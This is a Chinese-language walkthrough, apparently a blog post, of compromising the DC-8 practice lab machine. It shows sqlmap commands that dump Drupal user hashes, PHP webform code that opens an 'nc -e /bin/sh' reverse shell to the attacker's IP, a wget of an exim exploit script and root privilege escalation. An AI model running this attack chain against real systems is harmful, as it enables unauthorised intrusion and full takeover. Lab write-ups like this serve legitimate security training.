dc-8

扫描主机地址
在这里插入图片描述

扫描开放端口

在这里插入图片描述

开启80端口,访问
随便点点,发现id值,应该存在注入点

在这里插入图片描述
使用sqlmap爆破

python sqlmap.py -u http://192.168.110.136/?nid=1 --dbs

在这里插入图片描述

爆破d7db数据库

python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db --tables

在这里插入图片描述
在这里插入图片描述

发现users表,列出字段

python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db -T users --columns

在这里插入图片描述
在这里插入图片描述

列出指定字段

python sqlmap.py -u http://192.168.110.136/?nid=1 -D d7db -T users -C name,pass --dump

在这里插入图片描述
在这里插入图片描述

得到两个用户和加密的密码

admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

使用john破解

在这里插入图片描述

破解了好长时间发现只能破解john用户
登录网站

在这里插入图片描述

登录后点击上面的Find content,选择Contact Us,后点击Webform -> form settings,选择PHP code

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

选择PHP code之后输入代码,点击最下面的Save configuration,kali端监听

<p>GETSHELL</p>
<?php
system("nc -e /bin/sh 192.168.110.11  4567");
?>

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

保存成功点击Contact Us,输入信息后点击Submit

在这里插入图片描述

kali连接成功

python -c 'import pty;pty.spawn("/bin/bash")'

使用find命令查找具有suid权限的命令,找到一个exim4命令,exim是一款在Unix系统上使用的邮件服务,exim4在使用时具有root权限

在这里插入图片描述

查看版本

/usr/sbin/exim4 –version

在这里插入图片描述

查找漏洞

searchsploit exim

在这里插入图片描述

把46996.sh文件拷贝到本地,并改名,然后开启http服务

在这里插入图片描述

在这里插入图片描述

连接的靶机下载文件

wget http://192.168.110.11:8000/root/123.sh

在这里插入图片描述

添加执行权限

chmod +x 123.sh

在这里插入图片描述

根据脚本提示执行命令参数

./123.sh -m netcat

在这里插入图片描述

在这里插入图片描述

找不到文件,可能是脚本的原因。vim打开,:set ff=unix 然后保存退出。靶机重新下载,添加权限,执行

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提权成功!

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值